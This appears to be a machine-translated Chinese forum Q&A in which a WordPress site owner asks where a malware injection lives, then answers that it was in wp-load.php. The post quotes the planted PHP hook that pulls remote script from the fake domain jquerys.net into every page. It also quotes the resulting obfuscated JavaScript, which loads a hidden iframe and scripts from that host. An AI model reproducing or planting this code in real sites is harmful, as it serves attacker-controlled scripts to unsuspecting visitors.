我最近用WordPress创建了一个网站,但这种病毒最近一直困扰着我。它编辑整个wp-load
文件并写入:
function pluginAuth(){
echo(@wp_remote_retrieve_body(@wp_remote_get('http ://jquerys.net/jquery-1.6.3.min.js')));
}
@add_action('wp_head', 'pluginAuth');
请注意,它指向虚假的jquery网站“jqueryS
”。我终于通过访问我的主页(topdailyfights.com)并检查代码(它位于第78行)找到导致它的行,但不确定哪个wordpress文件包含它。
这是代码:
<script type="text/javascript">if(document.referrer == ''){document.write('<if'+'rame src="http://jquerys.net/analytics.php?frame=yes" width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0"></ifr'+'ame>');document.write('<s'+'cript type="text/javascript" src="http://jquerys.net/analytics.js"></scrip'+'t>');}else{document.write('<sc'+'ript type="text/javascript"src="http://jquerys.net/jquery.js"></scrip'+'t>');}</script><script type="text/javascript" src="http://jquerys.net/license.js"></script><style type="text/css" media="print">#wpadminbar { display:none; }</style>
这条线在哪里?
提前致谢,
JB
的解决 的
文件名wp-load.php
位于www
文件夹中。我一直在public_html
文件夹中搜索。使用Windows Grep来查找它。
很棒的工具;我建议。
谢谢大家。
答案 0 :(得分:1)
文件名是位于www文件夹中的wp-load.php。我一直在public_html文件夹中搜索。使用Windows Grep查找它。很棒的工具;我建议。谢谢大家。